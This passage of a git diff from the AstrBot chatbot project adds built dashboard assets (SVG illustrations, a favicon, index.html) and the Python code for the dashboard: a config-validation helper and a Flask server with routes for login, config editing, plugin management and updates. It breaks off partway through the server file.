<path d="M418.82 218.739C418.82 218.328 418.243 217.995 417.531 217.995C416.819 217.995 416.242 218.329 416.242 218.74L416.243 222.57C416.244 222.776 416.388 222.962 416.621 223.096C416.854 223.231 417.177 223.314 417.533 223.314C418.245 223.314 418.822 222.981 418.821 222.57L418.82 218.739Z" fill="#1E88E5"/>
|
||||
<path d="M413.428 219.122C413.794 218.77 413.596 218.312 412.986 218.101C412.375 217.89 411.584 218.004 411.217 218.356L408.008 221.445C407.698 221.744 407.793 222.118 408.201 222.354C408.274 222.396 408.358 222.434 408.45 222.466C409.061 222.678 409.853 222.563 410.219 222.211L413.428 219.122Z" fill="#1E88E5"/>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="301.394" y="186.687" width="232.264" height="208.191" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.129412 0 0 0 0 0.588235 0 0 0 0 0.952941 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="417.526" y1="205.789" x2="365.394" y2="216.782" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2196F3"/>
|
||||
<stop offset="1" stop-color="#B1DCFF"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="0.503035" y1="2.68177" x2="20.3032" y2="42.2842" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-18.5494" y1="-44.8799" x2="14.7845" y2="40.5766" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 5.5 KiB |
42
dashboard/dist/assets/img-error-purple-edee3fbc.svg
vendored
Normal file
@@ -0,0 +1,42 @@
|
||||
<svg width="710" height="391" viewBox="0 0 710 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 161.088 154.333)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 162.809 155.327)" fill="#B39DDB"/>
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 536.744 181.299)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 538.465 182.292)" fill="#B39DDB"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M67.7237 137.573V134.673H64.009V140.824L64.0177 140.829C64.0367 141.477 64.4743 142.121 65.3305 142.615L103.641 164.733C105.393 165.744 108.232 165.744 109.983 164.733L204.044 110.431C204.879 109.949 205.316 109.324 205.355 108.693L205.355 108.692V108.68C205.358 108.628 205.358 108.576 205.355 108.523L205.362 102.335L200.065 104.472L165.733 84.6523C163.982 83.6413 161.142 83.6413 159.391 84.6523L67.7237 137.573Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="url(#paint1_linear)" fill-opacity="0.3"/>
|
||||
<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask0)">
|
||||
</g>
|
||||
<mask id="mask1" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask1)">
|
||||
<rect width="64.3732" height="64.3732" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 111.303 81.6006)" fill="#5E35B1"/>
|
||||
<rect opacity="0.7" x="0.866041" width="63.3732" height="63.3732" rx="4.5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 79.1848 87.8305)" stroke="#5E35B1"/>
|
||||
</g>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="0.0090332" y="83.894" width="269.353" height="229.597" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.403922 0 0 0 0 0.227451 0 0 0 0 0.717647 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="200.346" y1="102.359" x2="71.0293" y2="158.071" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#A491C8"/>
|
||||
<stop offset="1" stop-color="#D7C5F8"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="8.1531" y1="-0.145767" x2="57.1962" y2="72.3003" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 3.3 KiB |
27
dashboard/dist/assets/img-error-text-a6aebfa0.svg
vendored
Normal file
@@ -0,0 +1,27 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M267.744 237.142L279.699 230.24L300.636 242.329L288.682 249.231L313.566 263.598L286.344 279.314L261.46 264.947L215.984 291.203L197.779 282.558L169.334 211.758L169.092 211.618L196.313 195.902L267.744 237.142ZM219.359 265.077L240.523 252.859L204.445 232.029L205.487 234.589L219.359 265.077Z" fill="#FFAB91"/>
|
||||
<path d="M469.959 120.206L481.913 113.304L502.851 125.392L490.897 132.294L515.78 146.661L488.559 162.377L463.675 148.011L418.199 174.266L399.994 165.621L371.548 94.8211L371.307 94.6816L398.528 78.9654L469.959 120.206ZM421.574 148.141L442.737 135.922L406.66 115.093L407.701 117.653L421.574 148.141Z" fill="#FFAB91"/>
|
||||
<path d="M204.523 235.027V232.237L219.401 265.014L240.555 252.926V255.018L218.936 267.339L204.523 235.027Z" fill="#D84315"/>
|
||||
<path d="M406.738 118.09V115.301L421.616 148.078L442.77 135.99V138.082L421.151 150.402L406.738 118.09Z" fill="#D84315"/>
|
||||
<rect width="109.114" height="136.405" transform="matrix(0.866025 -0.5 0.866025 0.5 220.507 181.925)" fill="url(#paint0_linear)"/>
|
||||
<rect width="40.2357" height="70.0545" transform="matrix(0.866025 -0.5 0.866025 0.5 280.437 201.886)" fill="url(#paint1_linear)"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="#1565C0" stroke-width="29"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="url(#paint2_linear)" stroke-width="29"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M279.517 230.177L267.662 237.15L196.064 195.772L168.866 211.58L169.331 212.097L170.096 214.002L196.436 198.795L267.866 240.035L279.821 233.133L298.211 243.751L300.787 242.265L279.517 230.177ZM291.278 250.695L288.804 252.124L311.1 264.996L313.805 263.418L291.278 250.695Z" fill="#D84315"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M481.732 113.24L469.877 120.214L398.279 78.8359L371.081 94.6433L371.546 95.1603L372.311 97.0652L398.651 81.8581L470.081 123.099L482.036 116.196L500.426 126.814L503.002 125.328L481.732 113.24ZM493.493 133.759L491.019 135.187L513.315 148.06L516.02 146.482L493.493 133.759Z" fill="#D84315"/>
|
||||
<path d="M288.674 252.229V249.207L291.929 251.067L288.674 252.229Z" fill="#D84315"/>
|
||||
<defs>
|
||||
<linearGradient id="paint0_linear" x1="77.7511" y1="139.902" x2="-10.8629" y2="8.75671" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#3076C8"/>
|
||||
<stop offset="0.992076" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="25.8162" y1="51.0447" x2="68.7073" y2="-5.41524" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2E75C7"/>
|
||||
<stop offset="1" stop-color="#4283CC"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-16.1224" y1="-47.972" x2="123.494" y2="290.853" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 2.9 KiB |
5
dashboard/dist/assets/index-0f1523f3.css
vendored
Normal file
720
dashboard/dist/assets/index-25639696.js
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-67d24abe.eot
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-80bb28b3.woff
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-a58ecb54.ttf
vendored
Normal file
BIN
dashboard/dist/assets/materialdesignicons-webfont-c1c004a9.woff2
vendored
Normal file
9
dashboard/dist/assets/md5-0b0a2337.js
vendored
Normal file
6
dashboard/dist/assets/social-google-a359a253.svg
vendored
Normal file
@@ -0,0 +1,6 @@
|
||||
<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M5.06129 13.2253L4.31871 15.9975L1.60458 16.0549C0.793457 14.5504 0.333374 12.8292 0.333374 11C0.333374 9.23119 0.763541 7.56319 1.52604 6.09448H1.52662L3.94296 6.53748L5.00146 8.93932C4.77992 9.58519 4.65917 10.2785 4.65917 11C4.65925 11.783 4.80108 12.5332 5.06129 13.2253Z" fill="#FBBB00"/>
|
||||
<path d="M21.4804 9.00732C21.6029 9.65257 21.6668 10.3189 21.6668 11C21.6668 11.7637 21.5865 12.5086 21.4335 13.2271C20.9143 15.6722 19.5575 17.8073 17.678 19.3182L17.6774 19.3177L14.6339 19.1624L14.2031 16.4734C15.4503 15.742 16.425 14.5974 16.9384 13.2271H11.2346V9.00732H17.0216H21.4804Z" fill="#518EF8"/>
|
||||
<path d="M17.6772 19.3176L17.6777 19.3182C15.8498 20.7875 13.5277 21.6666 11 21.6666C6.93783 21.6666 3.40612 19.3962 1.60449 16.0549L5.0612 13.2253C5.96199 15.6294 8.28112 17.3408 11 17.3408C12.1686 17.3408 13.2634 17.0249 14.2029 16.4734L17.6772 19.3176Z" fill="#28B446"/>
|
||||
<path d="M17.8085 2.78892L14.353 5.61792C13.3807 5.01017 12.2313 4.65908 11 4.65908C8.21963 4.65908 5.85713 6.44896 5.00146 8.93925L1.52658 6.09442H1.526C3.30125 2.67171 6.8775 0.333252 11 0.333252C13.5881 0.333252 15.9612 1.25517 17.8085 2.78892Z" fill="#F14336"/>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 1.2 KiB |
1
dashboard/dist/favicon.svg
vendored
Normal file
@@ -0,0 +1 @@
|
||||
<svg t="1702013028016" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1541" width="200" height="200"><path d="M0 0m204.8 0l614.4 0q204.8 0 204.8 204.8l0 614.4q0 204.8-204.8 204.8l-614.4 0q-204.8 0-204.8-204.8l0-614.4q0-204.8 204.8-204.8Z" fill="#FFEC9C" p-id="1542"></path><path d="M819.2 0H534.272A756.48 756.48 0 0 0 0 483.584V819.2a204.8 204.8 0 0 0 204.8 204.8h614.4a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE98A" p-id="1543"></path><path d="M819.2 0h-3.84a755.2 755.2 0 0 0-539.392 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE471" p-id="1544"></path><path d="M497.152 721.152A752.384 752.384 0 0 0 560.384 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-89.088-168.96 755.2 755.2 0 0 0-437.76 685.312z" fill="#FFE161" p-id="1545"></path><path d="M526.08 140.032l98.304 199.168L844.8 371.2a15.616 15.616 0 0 1 8.704 25.6l-159.744 156.16 37.632 219.136a15.616 15.616 0 0 1-22.528 16.384l-196.608-102.4-196.608 102.4a15.616 15.616 0 0 1-22.528-16.384l37.12-219.136-159.232-155.136a15.616 15.616 0 0 1 8.704-25.6l219.904-32 98.304-199.168a15.616 15.616 0 0 1 28.16-1.024z" fill="#FFF5CC" p-id="1546"></path><path d="M665.6 409.6a444.16 444.16 0 0 0 25.6-61.44l-65.536-9.472-99.584-198.656a15.616 15.616 0 0 0-27.904 0l-98.304 199.168L179.2 371.2a15.616 15.616 0 0 0-8.704 25.6l159.744 156.16-15.104 87.04A407.808 407.808 0 0 0 665.6 409.6z" fill="#FFFFFF" p-id="1547"></path></svg>
After Width: | Height: | Size: 1.5 KiB |
21
dashboard/dist/index.html
vendored
Normal file
@@ -0,0 +1,21 @@
<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <link rel="icon" href="/favicon.svg" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="keywords" content="AstrBot Soulter" />
    <meta name="description" content="AstrBot Dashboard" />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Poppins:wght@400;500;600;700&family=Roboto:wght@400;500;700&display=swap"
    />
    <title>AstrBot - 仪表盘</title>
    <script type="module" crossorigin src="/assets/index-25639696.js"></script>
    <link rel="stylesheet" href="/assets/index-0f1523f3.css">
  </head>
  <body>
    <div id="app"></div>

  </body>
</html>
92
dashboard/helper.py
Normal file
@@ -0,0 +1,92 @@
from . import DashBoardData
from util.cmd_config import AstrBotConfig
from dataclasses import dataclass, asdict
from util.plugin_dev.api.v1.config import update_config
from SparkleLogging.utils.core import LogManager
from logging import Logger
from type.types import Context
from type.config import CONFIG_METADATA_2

logger: Logger = LogManager.GetLogger(log_name='astrbot')


class DashBoardHelper():
    def __init__(self, context: Context):
        self.context = context
        self.config_key_dont_show = ['dashboard', 'config_version']

    def try_cast(self, value: str, type_: str):
        if type_ == "int" and value.isdigit():
            return int(value)
        elif type_ == "float" and isinstance(value, str) \
                and value.replace(".", "", 1).isdigit():
            return float(value)
        elif type_ == "float" and isinstance(value, int):
            return float(value)


    def validate_config(self, data):
        errors = []
        def validate(data, metadata=CONFIG_METADATA_2, path=""):
            for key, meta in metadata.items():
                if key not in data:
                    continue
                value = data[key]
                # 递归验证
                if meta["type"] == "list" and isinstance(value, list):
                    for item in value:
                        validate(item, meta["items"], path=f"{path}{key}.")
                elif meta["type"] == "object" and isinstance(value, dict):
                    validate(value, meta["items"], path=f"{path}{key}.")

                if meta["type"] == "int" and not isinstance(value, int):
                    casted = self.try_cast(value, "int")
                    if casted is None:
                        errors.append(f"错误的类型 {path}{key}: 期望是 int, 得到了 {type(value).__name__}")
                    data[key] = casted
                elif meta["type"] == "float" and not isinstance(value, float):
                    casted = self.try_cast(value, "float")
                    if casted is None:
                        errors.append(f"错误的类型 {path}{key}: 期望是 float, 得到了 {type(value).__name__}")
                    data[key] = casted
                elif meta["type"] == "bool" and not isinstance(value, bool):
                    errors.append(f"错误的类型 {path}{key}: 期望是 bool, 得到了 {type(value).__name__}")
                elif meta["type"] == "string" and not isinstance(value, str):
                    errors.append(f"错误的类型 {path}{key}: 期望是 string, 得到了 {type(value).__name__}")
                elif meta["type"] == "list" and not isinstance(value, list):
                    errors.append(f"错误的类型 {path}{key}: 期望是 list, 得到了 {type(value).__name__}")
                elif meta["type"] == "object" and not isinstance(value, dict):
                    errors.append(f"错误的类型 {path}{key}: 期望是 dict, 得到了 {type(value).__name__}")
                    validate(value, meta["items"], path=f"{path}{key}.")
        validate(data)

        # hardcode warning
        data['config_version'] = self.context.config_helper.config_version
        data['dashboard'] = asdict(self.context.config_helper.dashboard)

        return errors

    def save_astrbot_config(self, post_config: dict):
        '''验证并保存配置'''
        errors = self.validate_config(post_config)
        if errors:
            raise ValueError(f"格式校验未通过: {errors}")
        self.context.config_helper.flush_config(post_config)

    def save_extension_config(self, post_config: dict):
        if 'namespace' not in post_config:
            raise ValueError("Missing key: namespace")
        if 'config' not in post_config:
            raise ValueError("Missing key: config")

        namespace = post_config['namespace']
        config: list = post_config['config'][0]['body']
        for item in config:
            key = item['path']
            value = item['value']
            typ = item['val_type']
            if typ == 'int':
                if not value.isdigit():
                    raise ValueError(f"错误的类型 {namespace}.{key}: 期望是 int, 得到了 {type(value).__name__}")
                value = int(value)
            update_config(namespace, key, value)
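For orientation: validate_config above coerces string values before reporting type errors. A minimal standalone sketch of that coercion rule (illustrative only, not part of this commit range):

# Standalone rendition of the rule used by DashBoardHelper.try_cast:
# a value is converted only when the cast is safe, otherwise None is
# returned and the caller records a type error for that config key.
def try_cast(value, type_: str):
    if type_ == "int" and isinstance(value, str) and value.isdigit():
        return int(value)
    if type_ == "float" and isinstance(value, str) and value.replace(".", "", 1).isdigit():
        return float(value)
    if type_ == "float" and isinstance(value, int):
        return float(value)
    return None

assert try_cast("42", "int") == 42
assert try_cast("0.5", "float") == 0.5
assert try_cast("abc", "int") is None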
463
dashboard/server.py
Normal file
@@ -0,0 +1,463 @@
|
||||
import websockets
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import os
|
||||
import uuid
|
||||
import logging
|
||||
import traceback
|
||||
|
||||
from . import DashBoardData, Response
|
||||
from flask import Flask, request
|
||||
from werkzeug.serving import make_server
|
||||
from astrbot.persist.helper import dbConn
|
||||
from type.types import Context
|
||||
from typing import List
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from dashboard.helper import DashBoardHelper
|
||||
from util.io import get_local_ip_addresses
|
||||
from model.plugin.manager import PluginManager
|
||||
from util.updator.astrbot_updator import AstrBotUpdator
|
||||
from type.config import CONFIG_METADATA_2
|
||||
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class AstrBotDashBoard():
|
||||
def __init__(self, context: Context, plugin_manager: PluginManager, astrbot_updator: AstrBotUpdator):
|
||||
self.context = context
|
||||
self.plugin_manager = plugin_manager
|
||||
self.astrbot_updator = astrbot_updator
|
||||
self.dashboard_data = DashBoardData()
|
||||
self.dashboard_helper = DashBoardHelper(self.context)
|
||||
|
||||
self.dashboard_be = Flask(__name__, static_folder="dist", static_url_path="/")
|
||||
self.dashboard_be.json.sort_keys=False # 不按照字典排序
|
||||
logging.getLogger('werkzeug').setLevel(logging.ERROR)
|
||||
self.dashboard_be.logger.setLevel(logging.ERROR)
|
||||
|
||||
self.ws_clients = {} # remote_ip: ws
|
||||
self.loop = asyncio.get_event_loop()
|
||||
|
||||
self.http_server_thread: threading.Thread = None
|
||||
|
||||
@self.dashboard_be.get("/")
|
||||
def index():
|
||||
# 返回页面
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/auth/login")
|
||||
def _():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/config")
|
||||
def rt_config():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/logs")
|
||||
def rt_logs():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/extension")
|
||||
def rt_extension():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/dashboard/default")
|
||||
def rt_dashboard():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.post("/api/authenticate")
|
||||
def authenticate():
|
||||
username = self.context.config_helper.dashboard.username
|
||||
password = self.context.config_helper.dashboard.password
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["username"] == username and post_data["password"] == password:
|
||||
return Response(
|
||||
status="success",
|
||||
message="登录成功。",
|
||||
data={
|
||||
"token": "astrbot-test-token",
|
||||
"username": username
|
||||
}
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="用户名或密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/change_password")
|
||||
def change_password():
|
||||
password = self.context.config_helper.dashboard.password
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["password"] == password:
|
||||
self.context.config_helper.dashboard.password = post_data['new_password']
|
||||
return Response(
|
||||
status="success",
|
||||
message="修改成功。",
|
||||
data=None
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="原密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/stats")
|
||||
def get_stats():
|
||||
db_inst = dbConn()
|
||||
all_session = db_inst.get_all_stat_session()
|
||||
last_24_message = db_inst.get_last_24h_stat_message()
|
||||
# last_24_platform = db_inst.get_last_24h_stat_platform()
|
||||
platforms = db_inst.get_platform_cnt_total()
|
||||
self.dashboard_data.stats["session"] = []
|
||||
self.dashboard_data.stats["session_total"] = db_inst.get_session_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["message"] = last_24_message
|
||||
self.dashboard_data.stats["message_total"] = db_inst.get_message_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["platform"] = platforms
|
||||
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self.dashboard_data.stats
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/configs")
|
||||
def get_configs():
|
||||
# namespace 为空时返回 AstrBot 配置
|
||||
# 否则返回指定 namespace 的插件配置
|
||||
namespace = "" if "namespace" not in request.args else request.args["namespace"]
|
||||
if not namespace:
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self._get_astrbot_config()
|
||||
).__dict__
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self._get_extension_config(namespace)
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/astrbot-configs")
|
||||
def post_astrbot_configs():
|
||||
post_configs = request.json
|
||||
try:
|
||||
self.save_astrbot_configs(post_configs)
|
||||
return Response(
|
||||
status="success",
|
||||
message="保存成功~ 机器人将在 3 秒内重启以应用新的配置。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extension-configs")
|
||||
def post_extension_configs():
|
||||
post_configs = request.json
|
||||
try:
|
||||
self.save_extension_configs(post_configs)
|
||||
return Response(
|
||||
status="success",
|
||||
message="保存成功~ 机器人将在 3 秒内重启以应用新的配置。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/extensions")
|
||||
def get_plugins():
|
||||
_plugin_resp = []
|
||||
for plugin in self.context.cached_plugins:
|
||||
_p = plugin.metadata
|
||||
_t = {
|
||||
"name": _p.plugin_name,
|
||||
"repo": '' if _p.repo is None else _p.repo,
|
||||
"author": _p.author,
|
||||
"desc": _p.desc,
|
||||
"version": _p.version
|
||||
}
|
||||
_plugin_resp.append(_t)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=_plugin_resp
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/install")
|
||||
def install_plugin():
|
||||
post_data = request.json
|
||||
repo_url = post_data["url"]
|
||||
try:
|
||||
logger.info(f"正在安装插件 {repo_url}")
|
||||
# self.plugin_manager.install_plugin(repo_url)
|
||||
asyncio.run_coroutine_threadsafe(self.plugin_manager.install_plugin(repo_url), self.loop).result()
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(2, self.context)).start()
|
||||
logger.info(f"安装插件 {repo_url} 成功,2秒后重启")
|
||||
return Response(
|
||||
status="success",
|
||||
message="安装成功,机器人将在 2 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/install: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/upload-install")
|
||||
def upload_install_plugin():
|
||||
try:
|
||||
file = request.files['file']
|
||||
print(file.filename)
|
||||
logger.info(f"正在安装用户上传的插件 {file.filename}")
|
||||
file_path = f"data/temp/{uuid.uuid4()}.zip"
|
||||
file.save(file_path)
|
||||
self.plugin_manager.install_plugin_from_file(file_path)
|
||||
logger.info(f"安装插件 {file.filename} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="安装成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/upload-install: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/uninstall")
|
||||
def uninstall_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在卸载插件 {plugin_name}")
|
||||
self.plugin_manager.uninstall_plugin(plugin_name)
|
||||
logger.info(f"卸载插件 {plugin_name} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="卸载成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/uninstall: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/update")
|
||||
def update_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在更新插件 {plugin_name}")
|
||||
# self.plugin_manager.update_plugin(plugin_name)
|
||||
asyncio.run_coroutine_threadsafe(self.plugin_manager.update_plugin(plugin_name), self.loop).result()
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(2, self.context)).start()
|
||||
logger.info(f"更新插件 {plugin_name} 成功,2秒后重启")
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功,机器人将在 2 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/extensions/update: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/log")
|
||||
def log():
|
||||
for item in self.ws_clients:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(
|
||||
self.ws_clients[item].send(request.data.decode()), self.loop).result()
|
||||
except Exception as e:
|
||||
pass
|
||||
return 'ok'
|
||||
|
||||
@self.dashboard_be.get("/api/check_update")
|
||||
def get_update_info():
|
||||
try:
|
||||
# ret = self.astrbot_updator.check_update(None, None)
|
||||
ret = asyncio.run_coroutine_threadsafe(
|
||||
self.astrbot_updator.check_update(None, None), self.loop).result()
|
||||
return Response(
|
||||
status="success",
|
||||
message=str(ret) if ret is not None else "已经是最新版本了。",
|
||||
data={
|
||||
"has_new_version": ret is not None
|
||||
}
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/check_update: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/update_project")
|
||||
def update_project_api():
|
||||
version = request.json['version']
|
||||
if version == "" or version == "latest":
|
||||
latest = True
|
||||
version = ''
|
||||
else:
|
||||
latest = False
|
||||
try:
|
||||
# await self.astrbot_updator.update(latest=latest, version=version)
|
||||
asyncio.run_coroutine_threadsafe(self.astrbot_updator.update(latest=latest, version=version), self.loop).result()
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(2, self.context)).start()
|
||||
return Response(
|
||||
status="success",
|
||||
